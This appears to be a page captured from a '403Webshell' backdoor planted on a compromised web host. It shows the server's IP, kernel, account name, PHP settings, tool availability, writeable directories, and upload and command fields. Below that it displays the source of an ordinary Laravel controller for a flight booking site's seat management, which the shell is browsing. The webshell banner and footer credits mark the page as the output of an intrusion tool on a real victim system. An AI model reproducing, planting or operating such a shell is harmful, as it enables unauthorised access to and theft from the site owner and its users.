403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.148.105.127
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/Flight/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/Flight/Controllers/ManageFlightSeatController.php
<?php
namespace Modules\Flight\Controllers;

use Illuminate\Http\Request;
use Illuminate\Support\Facades\Auth;
use Illuminate\Support\Facades\Validator;
use Illuminate\Validation\Rule;
use Modules\Flight\Models\Flight;
use Modules\Flight\Models\FlightSeat;
use Modules\Flight\Models\SeatType;
use Modules\FrontendController;

class ManageFlightSeatController extends FrontendController
{
    protected $flight;
    protected $currentFlight;
    /**
     * @var string
     */
    private $flightSeat;

    public function __construct()
    {
        parent::__construct();
        $this->flight = Flight::class;
        $this->flightSeat = FlightSeat::class;
    }

    protected function hasFlightPermission($flight_id = false){
        if(empty($flight_id)) return false;
        $flight = $this->flight::find($flight_id);
        if(empty($flight)) return false;
        if(!$this->hasPermission('flight_update') and $flight->create_user != Auth::id()){
            return false;
        }
        $this->currentFlight = $flight;
        return true;
    }
    public function index(Request $request,$flight_id)
    {
        $this->checkPermission('flight_view');

        if(!$this->hasFlightPermission($flight_id))
        {
            abort(403);
        }
        $query = $this->flightSeat::query() ;
        $query->orderBy('id', 'desc');
        if (!empty($flight_name = $request->input('s'))) {
            $query->where('title', 'LIKE', '%' . $flight_name . '%');
            $query->orderBy('title', 'asc');
        }
        $query->where('flight_id',$flight_id);
        $data = [
            'rows'               => $query->with(['author'])->paginate(20),
            'breadcrumbs'        => [
                [
                    'name' => __('Flights'),
                    'url'  => route('flight.vendor.index')
                ],
                [
                    'name' => __('Flight: :name',['name'=>$this->currentFlight->title]),
                    'url'  => route('flight.vendor.edit',[$this->currentFlight->id])
                ],
                [
                    'name'  => __('All Flight seats'),
                    'class' => 'active'
                ],
            ],
            'page_title'=>__("Flight seat Management"),
            'currentFlight'=>$this->currentFlight,
            'row'=> new $this->flightSeat(),
        ];
        return view('Flight::frontend.manageFlight.seat.index', $data);
    }

    public function create($flight_id)
    {
        $this->checkPermission('flight_update');

        if(!$this->hasFlightPermission($flight_id))
        {
            abort(403);
        }
        $row = new $this->flightSeat();
        $data = [
            'row'            => $row,
            'translation'    => $row,
            'seatType'=>SeatType::all(),
            'enable_multi_lang'=>true,
            'breadcrumbs'    => [
                [
                    'name' => __('Flights'),
                    'url'  => route('flight.vendor.index')
                ],
                [
                    'name' => __('Flight: :name',['name'=>$this->currentFlight->title]),
                    'url'  => route('flight.vendor.edit',[$this->currentFlight->id])
                ],
                [
                    'name' => __('All Flight seats'),
                    'url'  => route("flight.vendor.seat.index",['flight_id'=>$this->currentFlight->id])
                ],
                [
                    'name'  => __('Create'),
                    'class' => 'active'
                ],
            ],
            'page_title'         => __("Create Flight seat"),
            'currentFlight'=>$this->currentFlight
        ];
        return view('Flight::frontend.manageFlight.seat.detail', $data);
    }

    public function edit(Request $request, $flight_id,$id)
    {
        $this->checkPermission('flight_update');

        if(!$this->hasFlightPermission($flight_id))
        {
            abort(403);
        }

        $row = $this->flightSeat::find($id);
        if (empty($row) or $row->flight_id != $flight_id) {
            return redirect(route('flight.vendor.seat.index',['flight_id'=>$flight_id]));
        }


        $data = [
            'row'            => $row,
            'translation'    => $row,
            'seatType'=>SeatType::all(),
            'enable_multi_lang'=>false,
            'breadcrumbs'    => [
                [
                    'name' => __('Flights'),
                    'url'  => route('flight.vendor.index')
                ],
                [
                    'name' => __('Flight: :name',['name'=>$this->currentFlight->title]),
                    'url'  => route('flight.vendor.edit',[$this->currentFlight->id])
                ],
                [
                    'name' => __('All Flight seats'),
                    'url'  => route("flight.vendor.seat.index",['flight_id'=>$this->currentFlight->id])
                ],
                [
                    'name' => __('Edit  :name',['name'=>$row->title]),
                    'class' => 'active'
                ],
            ],
            'page_title'=>__("Edit: :name",['name'=>$row->title]),
            'currentFlight'=>$this->currentFlight
        ];
        return view('Flight::frontend.manageFlight.seat.detail', $data);
    }

    public function store( Request $request, $flight_id,$id ){

        if(!$this->hasFlightPermission($flight_id))
        {
            abort(403);
        }
        if($id>0){
            $this->checkPermission('flight_update');
            $row = $this->flightSeat::find($id);
            if (empty($row)) {
                return redirect(route('flight.vendor.index'));
            }
            if($row->flight_id != $flight_id)
            {
                return redirect(route('flight.vendor.seat.index'));
            }
        }else{
            $this->checkPermission('flight_create');
            $row = new $this->flightSeat();
        }
        $validator = Validator::make($request->all(), [
            'seat_type'=>[
                'required',
                Rule::unique(FlightSeat::getTableName())->where(function ($query)use($flight_id){
                    return $query->where('flight_id',$flight_id);
                })->ignore($row)
            ],
            'price'=>'required',
            'max_passengers'=>'required',
        ]);
        if ($validator->fails()) {
            return redirect()->back()->with(['errors' => $validator->errors()]);
        }
        $dataKeys = [
            'seat_type','price','max_passengers','person','baggage_check_in','baggage_cabin'
        ];

        $row->fillByAttr($dataKeys,$request->input());

        if(!empty($id) and $id == "-1"){
            $row->flight_id = $flight_id;
        }

        $res = $row->save();

        if ($res) {
            if($id > 0 ){
                return redirect()->back()->with('success',  __('Flight seat updated') );
            }else{
                return redirect(route('flight.vendor.seat.edit',['flight_id'=>$flight_id,'id'=>$row->id]))->with('success', __('Flight seat created') );
            }
        }
    }


    public function delete($flight_id,$id )
    {
        $this->checkPermission('flight_delete');
        $user_id = Auth::id();
        $query = $this->flightSeat::where("flight_id", $flight_id)->where("id", $id)->first();
        if(!empty($query)){
            $query->delete();
        }
        return redirect()->back()->with('success', __('Delete room success!'));
    }

    public function bulkEdit(Request $request , $flight_id )
    {
        $ids = $request->input('ids');

        $this->checkPermission('flight_update');
        $action = $request->input('action');
        if (empty($ids) or !is_array($ids)) {
            return redirect()->back()->with('error', __('No items selected!'));
        }
        if (empty($action)) {
            return redirect()->back()->with('error', __('Please select an action!'));
        }
        switch ($action){
            case "delete":
                foreach ($ids as $id) {
                    $query = $this->flightSeat::where("id", $id);
                    $query->where("create_user", Auth::id());
                    $this->checkPermission('flight_delete');
                    $row  =  $query->first();
                    if(!empty($row)){
                        $row->delete();
                    }
                }
                return redirect()->back()->with('success', __('Deleted success!'));
                break;
            case "permanently_delete":
                foreach ($ids as $id) {
                    $query = $this->flightSeat::where("id", $id);
                    if (!$this->hasPermission('flight_manage_others')) {
                        $query->where("create_user", Auth::id());
                        $this->checkPermission('flight_delete');
                    }
                    $row  =  $query->first();
                    if($row){
                        $row->delete();
                    }
                }
                return redirect()->back()->with('success', __('Permanently delete success!'));
                break;

            default:
                // Change status
                foreach ($ids as $id) {
                    $query = $this->flightSeat::where("id", $id);
                    $query->where("create_user", Auth::id());
                    $this->checkPermission('flight_update');
                    $row = $query->first();
                    $row->status  = $action;
                    $row->save();
                }
                return redirect()->back()->with('success', __('Update success!'));
                break;
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit